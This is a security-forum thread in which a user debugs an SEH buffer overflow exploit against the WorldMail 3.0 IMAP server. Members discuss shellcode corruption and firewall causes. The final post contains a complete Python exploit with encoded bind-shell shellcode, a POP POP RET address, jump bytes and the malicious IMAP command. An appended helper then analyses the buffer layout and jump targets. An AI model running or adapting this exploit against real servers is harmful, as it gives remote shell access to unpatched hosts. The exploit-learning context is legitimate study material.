
Shellcode Executes but Cannot Connect to the victim !

zaixer
Newbie
Posts: 9
Joined: Thu Jun 13, 2013 12:33 pm

Post Fri Jun 28, 2013 9:34 pm

Shellcode Executes but Cannot Connect to the victim !

Hi all,

I am trying to exploit an SEH bof on "Eudora Qualcomm WorldMail 3.0 (IMAPd)". The shellcode is bind_tcp on port 4444. Everything works fine: I removed all bad characters, verified that the code is placed at the right offset, and the code executes. I verify this by running "netstat -noa" on the victim machine, which shows that it is listening on port 4444 as expected.
The problem arises when I try to connect to this port using netcat. Once I connect to the victim, the program crashes in the debugger, although it was "Running" without problems just before I connected to it.

I even tried connecting to it from the victim machine itself to rule out any network problem; however, the same problem happens!

Thanks in advance !
hanyhasan
Newbie
Posts: 17
Joined: Fri May 17, 2013 12:09 pm

Post Sat Jun 29, 2013 3:33 am

Re: Shellcode Executes but Cannot Connect to the victim !

Hi

Check this write-up about WorldMail 3.0:
http://www.bnxnet.com/2012/10/01/seh-worldmail-example/
zaixer
Newbie
Posts: 9
Joined: Thu Jun 13, 2013 12:33 pm

Post Sat Jun 29, 2013 12:48 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Thanks Hany,

Actually, I have already reviewed it; however, I doubt that it is a working one, as the shellcode used contains bad chars like \x00!
dynamik
Recruiters
Posts: 1119
Joined: Sun Nov 09, 2008 11:00 am
Location: Mile High City

Post Sat Jun 29, 2013 1:39 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Can you paste your exploit? It's difficult to provide much guidance without seeing it.

Try doing a stack adjustment by subtracting something like -1500 from ESP before your shellcode. I've had the shellcode get corrupted as it decodes. It might get far enough to open a socket, but the rest is broken.
The day you stop learning is the day you start becoming obsolete.
the_hutch
Newbie
Posts: 9
Joined: Mon Jul 01, 2013 2:05 pm

Post Mon Jul 01, 2013 2:48 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Don't know why people are asking for exploit code on this one. OP obviously has a working exploit if the payload was executed (as evidenced by the open port 4444). The problem is somewhere in the post-exploitation connection attempt.
The only thing I can think of is possibly a firewall sitting between you and the remote system that is white-listed (so it drops all incoming connections to ports that are not in standard use on the network), or a hardened host-based firewall, if the target is a Windows system.
Justin Hutchens
OSCP, CISSP, CNDA, CEH, ECSA, CHFI
http://www.linkedin.com/in/justinhutchens
Kali Linux - Backtrack Evolved
http://www.packtpub.com/kali-linux-back ... ting/video
superkojiman
Jr. Member
Posts: 81
Joined: Thu Sep 20, 2012 9:42 pm

Post Mon Jul 01, 2013 4:13 pm

Re: Shellcode Executes but Cannot Connect to the victim !

Easy way to check if it's something else blocking the exploit: set up a netcat listener on port 4444 on your victim machine. Then try connecting to it with netcat from your attacking machine. If it gets dropped, then there's something sitting in between preventing it from connecting.

If that works, then you need to examine the debugger closer. Do you know what's causing it to crash? Maybe one of the functions being called when you attempt to connect is returning an error?
hayabusa
Hero Member
Posts: 1662
Joined: Mon Jan 29, 2007 2:59 pm

Post Mon Jul 01, 2013 4:20 pm

Re: Shellcode Executes but Cannot Connect to the victim !

@the_hutch

I think you over-read the intent, in dynamik's response.

(Note, the OP said the listener crashed on a connection attempt. Not that it just didn't respond)

The reason dynamik asked is because, very obviously, while the exploit opened the listener, it has issues with what to do with a connection attempt. I don't think he's actually asking for the code, specific to the exploit, itself, but rather the payload portion of the exploit, where the execution occurs 'POST' exploit. Obviously, either a.) the payload is flawed, or b.) something corrupted the payload, in memory (or it didn't fit in memory), to the point where anything connecting to the listener causes it to crash, or c.) the payload code is making a call to a bad address.

And I also agree with superkojiman, who posted, as I was typing... ;)
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
the_hutch
Newbie
Posts: 9
Joined: Mon Jul 01, 2013 2:05 pm

Post Mon Jul 01, 2013 6:09 pm

Re: Shellcode Executes but Cannot Connect to the victim !

You're right...my bad. Jumped the gun on that one...
hayabusa
Hero Member
Posts: 1662
Joined: Mon Jan 29, 2007 2:59 pm

Post Tue Jul 02, 2013 7:53 am

Re: Shellcode Executes but Cannot Connect to the victim !

the_hutch wrote: You're right...my bad. Jumped the gun on that one...

No worries. I do it from time to time, too. (Much more often than I'd like to admit, sometimes.) It helps that many of us here have known dynamik (aka - ajohnson) for a couple of years now, so I pretty much knew where he was coming from (as well as recently having the privilege to meet him, face to face, for the first time - great guy)
the_hutch
Newbie
Posts: 9
Joined: Mon Jul 01, 2013 2:05 pm

Post Tue Jul 02, 2013 8:58 am

Re: Shellcode Executes but Cannot Connect to the victim !

Yeah....as the new guy around here, I should probably at least read the entire post before firing back replies and stepping on people's toes, lol.
zaixer
Newbie
Posts: 9
Joined: Thu Jun 13, 2013 12:33 pm

Post Tue Jul 02, 2013 10:54 am

Re: Shellcode Executes but Cannot Connect to the victim !

@dynamik, thanks for your response. For some reason it worked after adding some NOPs after the shellcode! Please check the code below:


====================================================================================================================
import socket
import sys

shellcode = ("\xb8\x3b\xe5\xd0\x36\xda\xd3\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
             "\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x34\x07\x25\xca\xa2\x4e"
             "\xc6\x33\x32\x31\x4e\xd6\x03\x63\x34\x92\x31\xb3\x3e\xf6\xb9"
             "\x38\x12\xe3\x4a\x4c\xbb\x04\xfb\xfb\x9d\x2b\xfc\xcd\x21\xe7"
             "\x3e\x4f\xde\xfa\x12\xaf\xdf\x34\x67\xae\x18\x28\x87\xe2\xf1"
             "\x26\x35\x13\x75\x7a\x85\x12\x59\xf0\xb5\x6c\xdc\xc7\x41\xc7"
             "\xdf\x17\xf9\x5c\x97\x8f\x72\x3a\x08\xb1\x57\x58\x74\xf8\xdc"
             "\xab\x0e\xfb\x34\xe2\xef\xcd\x78\xa9\xd1\xe1\x75\xb3\x16\xc5"
             "\x65\xc6\x6c\x35\x18\xd1\xb6\x47\xc6\x54\x2b\xef\x8d\xcf\x8f"
             "\x11\x42\x89\x44\x1d\x2f\xdd\x03\x02\xae\x32\x38\x3e\x3b\xb5"
             "\xef\xb6\x7f\x92\x2b\x92\x24\xbb\x6a\x7e\x8b\xc4\x6d\x26\x74"
             "\x61\xe5\xc5\x61\x13\xa4\x81\x46\x2e\x57\x52\xc0\x39\x24\x60"
             "\x4f\x92\xa2\xc8\x18\x3c\x34\x2e\x33\xf8\xaa\xd1\xbb\xf9\xe3"
             "\x15\xef\xa9\x9b\xbc\x8f\x21\x5c\x40\x5a\xe5\x0c\xee\x34\x46"
             "\xfd\x4e\xe4\x2e\x17\x41\xdb\x4f\x18\x8b\x6a\x48\xd6\xef\x3f"
             "\x3f\x1b\x10\xae\xe3\x92\xf6\xba\x0b\xf3\xa1\x52\xee\x20\x7a"
             "\xc5\x11\x03\xd6\x5e\x86\x1b\x30\x58\xa9\x9b\x16\xcb\x06\x33"
             "\xf1\x9f\x44\x80\xe0\xa0\x40\xa0\x6b\x99\x03\x3a\x02\x68\xb5"
             "\x3b\x0f\x1a\x56\xa9\xd4\xda\x11\xd2\x42\x8d\x76\x24\x9b\x5b"
             "\x6b\x1f\x35\x79\x76\xf9\x7e\x39\xad\x3a\x80\xc0\x20\x06\xa6"
             "\xd2\xfc\x87\xe2\x86\x50\xde\xbc\x70\x17\x88\x0e\x2a\xc1\x67"
             "\xd9\xba\x94\x4b\xda\xbc\x98\x81\xac\x20\x28\x7c\xe9\x5f\x85"
             "\xe8\xfd\x18\xfb\x88\x02\xf3\xbf\xb7\xf3\xc9\x55\x2f\xaa\xb8"
             "\x17\x2d\x4d\x17\x5b\x48\xce\x9d\x24\xaf\xce\xd4\x21\xeb\x48"
             "\x05\x58\x64\x3d\x29\xcf\x85\x14")

buffer = "\x90" * 300  # NOP sled to fill the first 300 bytes before the shellcode
buffer += shellcode  # Shellcode to spawn a shell listening on port 4444
buffer += "\x90" * 81  # NOP sled to fill the rest of the buffer after the shellcode
buffer += "\xEB\x06\x90\x90"  # Short JMP of 6 bytes (next SEH record)
buffer += "\x95\xcb\x0d\x60"  # Memory address of POP POP RETN sequence in module MsccMgr.dll
buffer += "\x90" * 8 + "\xe9\xff\xfc\xff\xff"  # 8 bytes of NOPs followed by a ~700-byte backward jump
buffer += "}" * 50  # Junk

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((sys.argv[1], int(sys.argv[2])))
except:
    print "Can't connect to server!\n"
    sys.exit(0)

print "[+] Connecting to victim !"
data = s.recv(1024)
print "[+] " + data.rstrip()
print "[+] Sending evil buffer..."
s.send('A013 UID FETCH 4827313:4827313 ' + buffer + "\r\n")
s.close()
print "[+] Exploitation Successful\n"
print "[+] Please Connect to port 4444 on victim IP now !\n"
==================================================================================================================
So when I move the 81 NOPs that come after the shellcode and place them before it (adding them to the 300 NOPs already there), the exploit fails!

Actually, I would appreciate it if you could let me know what is meant by stack adjustment!

@superkojiman, I am connecting to it from the local machine itself (nc 127.0.0.1 444) to avoid any network problems.
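As an added illustration (not the OP's code and not part of the thread), the Python 3 helper below models the buffer layout from the post above: it computes where each component sits, checks where the two relative jumps land, and encodes the stack adjustment dynamik mentioned in both the `add esp, -1500` and `sub esp, 1500` forms, so the null-byte difference (the bad char zaixer mentions) is visible. The shellcode is represented only by its posted length, 368 bytes; the component names are assumptions made here.

```python
import struct

# Buffer layout from the posted exploit, as (component, length in bytes).
# The shellcode blob is not reproduced; only its posted length (368) matters.
LAYOUT = [
    ("nop_sled_before", 300),
    ("shellcode", 368),
    ("nop_sled_after", 81),   # the 81 NOPs that made the difference
    ("nseh_jmp_short", 4),    # \xEB\x06\x90\x90
    ("seh_pop_pop_ret", 4),   # handler address in MsccMgr.dll
    ("nops_after_seh", 8),
    ("jmp_back", 5),          # \xe9\xff\xfc\xff\xff
    ("junk", 50),
]

def offsets(layout):
    """Map each component to its (start, end) offsets, end exclusive."""
    table, pos = {}, 0
    for name, size in layout:
        table[name] = (pos, pos + size)
        pos += size
    return table

def jump_target(at, insn):
    """Offset that a relative jmp at buffer offset `at` lands on.
    Supports jmp short (EB rel8) and jmp near (E9 rel32); both
    displacements are relative to the end of the instruction."""
    if insn[0] == 0xEB:
        return at + 2 + struct.unpack("<b", insn[1:2])[0]
    if insn[0] == 0xE9:
        return at + 5 + struct.unpack("<i", insn[1:5])[0]
    raise ValueError("not a relative jmp")

def region_of(layout, off):
    """Name of the component containing offset `off`, or None."""
    for name, (start, end) in offsets(layout).items():
        if start <= off < end:
            return name
    return None

def add_esp(delta):
    """Encode `add esp, imm32` (81 C4 imm32); a negative delta moves ESP down."""
    return b"\x81\xc4" + struct.pack("<i", delta)

def sub_esp(amount):
    """Encode `sub esp, imm32` (81 EC imm32)."""
    return b"\x81\xec" + struct.pack("<i", amount)

def has_bad_chars(data, bad=b"\x00"):
    """True if any byte of `bad` (default: the NUL the thread mentions) occurs."""
    return any(b in bad for b in data)
```

Running `region_of(LAYOUT, jump_target(765, b"\xe9\xff\xfc\xff\xff"))` shows the backward jump landing in the leading NOP sled, and `has_bad_chars(sub_esp(1500))` shows why the adjustment is normally written as an `add` of a negative value.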
